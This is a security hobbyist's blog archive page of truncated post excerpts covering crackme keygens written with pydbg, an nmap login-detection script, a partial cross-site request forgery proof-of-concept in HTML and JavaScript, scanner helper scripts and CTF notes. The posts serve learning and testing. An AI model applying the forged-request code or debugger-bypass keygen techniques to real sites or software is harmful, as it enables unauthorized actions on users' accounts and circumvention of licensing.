Archive for the ‘GrayHat’ Category
Thursday, July 8th, 2010 by webstersprodigy
This is an update to http://webstersprodigy.net/2010/07/07/pydbg-reverseme-solution/. I change a register now to circumvent the isdebuggerpresent call. import sys import ctypes from pydbg import * from pydbg.defines import * print "This is a very stupid keygen that uses a debug method and grabs the key from memory" print "prints out the valid key, and writes it [...]
Tags: pydbg, python, reverseme
Posted in GrayHat, Programming | No Comments »
Wednesday, July 7th, 2010 by webstersprodigy
Last week I wrote a keygen here: http://webstersprodigy.net/2010/06/22/reverseme-windows-keygen/. This is an almost identical problem, but the binary has been patched to allow debugging (I may do this programmaticly as well, but not yet). I wanted to solve this with programmatic debugging. Here is the exe: Ice9pch3. The code simply sets a breakpoint and prints the [...]
Tags: crackme, debugging, pydbg, python
Posted in GrayHat, Programming, windoze | 1 Comment »
Tuesday, June 22nd, 2010 by webstersprodigy
This one was challenging for me, and took me several hours, but was fun. I got caught up on certain parts that may not have been too difficult, but, yeah… http://crackmes.de/users/tripletordo/ice9/ You can download the executable here Ice9.zip. The first thing I noticed is probably the ‘trick’ which was simply a call to isdebuggerpresent. I [...]
Tags: crackmes, IDA, keygen, ollydbg
Posted in Bits and Bytes, GrayHat | No Comments »
Thursday, June 10th, 2010 by webstersprodigy
http://crackmes.de/users/d0min4ted/keygenme_by_d0min4ted/ In case the link goes away, here is a zip of the executable. crackme I cheated on this one and used reflector. This was an excuse for me to try reflector out… so I started with that in mind. The Checking code ends up being in crackme->WindowsFormsApplication4->Form1. You can deduce what most the buttons do. [...]
Tags: C sharp, reflector, reversing
Posted in Computers, GrayHat | No Comments »
Tuesday, June 8th, 2010 by webstersprodigy
To get back into the groove, I decided to try a crackme. After searching far and wide, I can’t seem to find where I got this from, other than crackmes.de. One of my favorite sites. Crackme.zip <– here it is in case it’s deleted. And the solution is, with no analysis: #include <iostream> #include <string> using [...]
Posted in Bits and Bytes, Computers, GrayHat | 1 Comment »
Wednesday, April 7th, 2010 by webstersprodigy
The title sort of explains it. description = [[ Attempts to check if a login page exists on the port. ]] — — @output — 80/tcp open http — |_ http-login-form: HTTP login detected — HTTP authentication information gathering script — rev 1.0 (2010-02-06) author = "Rich Lundeen <mopey@webstersprodigy.net>" license = "Same as Nmap–See http://nmap.org/book/man-legal.html" [...]
Tags: lua, nmap
Posted in GrayHat, Network, Programming | No Comments »
Wednesday, February 3rd, 2010 by webstersprodigy
POC XSRFs that only allow POST is not as straightforward as the GET. I use something like the following for situations like that. <html> <head></head> <body> <script> function poststuff() { var site = document.getElementById("posturl").value; var post_data = document.getElementById("postparam").value; alert("site: " + site); alert("pdata: " + post_data); var xmlhttp=new XMLHttpRequest(); xmlhttp.open("POST", site, true); xmlhttp.onreadystatechange = function [...]
Tags: xsrf
Posted in GrayHat | No Comments »
Sunday, January 3rd, 2010 by webstersprodigy
The code is pretty self explanatory. It searches through a .nessus file and spits out matching hosts.
Tags: nessus, python
Posted in GrayHat, Programming | No Comments »
Wednesday, December 30th, 2009 by webstersprodigy
Kind of an annoying problem, but sometimes nikto runs out of control. This is made worse by nessus, which can have a lot of nikto instances running at once.
Tags: nikto, python
Posted in GrayHat, Programming | No Comments »
Wednesday, October 14th, 2009 by webstersprodigy
This is a stupid script to scan a class b network. I only wanted a detailed scan of hosts that exist (which I generated with a ping scan). I also wanted this information separated by file.
Tags: nmap
Posted in GrayHat, Network, Programming | 2 Comments »
Tuesday, August 11th, 2009 by webstersprodigy
http://www.milw0rm.com/exploits/9410
Tags: wordpress
Posted in GrayHat | 2 Comments »
Thursday, July 23rd, 2009 by webstersprodigy
http://kenshoto.com/vtrace/ Documented commands (type help <topic>): ======================================== alias bpedit detach ignore meta resume stepi vstruct alloc bpfile dis lm mode script struct writemem attach break eval maps ps search suspend autocont bt exec mem python server syms bestname call fds memdump quit signal threads bp config go memprotect reg snapshot var So this looks [...]
Posted in GrayHat | No Comments »
Wednesday, July 8th, 2009 by webstersprodigy
The gnu Privacy handbook has a ton of useful information, but I thought I’d make a quick reference for the gpg usage I use most. Especially because I was just an idiot and lost my gpg private key (though I do remember the passphrase) – this time there will be a backup! List all keys [...]
Posted in GrayHat, Linux | No Comments »
Friday, May 8th, 2009 by webstersprodigy
I am doing some research that involves a *lot* of google searches. Because this research involves a significant number of directed queries, it seems logical to hide this information as much as practical. If there is a web host who notices sequential names in a Google referer URL repeatedly, this might raise suspicion or alter behavior which could skew results. Similarly, it is desirable to hide IP information from both the web host (for similar reasons) and possibly even search engines.
Tags: firefox, tor, ubuntu
Posted in GrayHat, Linux, Network | No Comments »
Wednesday, April 22nd, 2009 by webstersprodigy
Posted in GrayHat, Linux, windoze | No Comments »
Thursday, April 9th, 2009 by webstersprodigy
This is an oldie but goodie. I’ve seen format string bugs in the past, and have even exploited a few using the “magic formula”. Today, I thought it would be a good time to actually sit down and figure out how they work. The below link is an excellent resource to anyone learning about these: http://www.cgsecurity.org/Articles/SecProg/Art4/
Posted in GrayHat | 1 Comment »
Wednesday, March 18th, 2009 by webstersprodigy
For the security class I’m teaching we recently had a box to pwn. Problem is, they would sometimes get the address wrong and crash the virtual system. I probably would have just distributed the vdi, but not all of them have machines robust enough to run a vm, so I had to set something up.
Tags: virtualbox
Posted in GrayHat, Linux, windoze | 1 Comment »
Tuesday, March 3rd, 2009 by webstersprodigy
This is a progress report related to Disclosure.
Posted in GrayHat | No Comments »
Monday, December 22nd, 2008 by webstersprodigy
“The pixels in the above image are numbered 0..99 for the first row, 100..199 for the second row etc. White pixels represent ascii codes. The ascii code for a particular white pixel is equal to the offset from the last white pixel. For example, the first white pixel at location 65 would represent ascii code 65 (‘A’), the next at location 131 would represent ascii code (131 – 65) = 66 (‘B’) and so on.
Tags: hackthissite, python
Posted in GrayHat, Programming | No Comments »
Friday, August 15th, 2008 by webstersprodigy
Defcon 16 was a lot of fun. There were a lot of fun challenges, but my favorite was probably the wargames revereme in open capture the flag.
Tags: ctf, defcon, reversing
Posted in GrayHat | No Comments »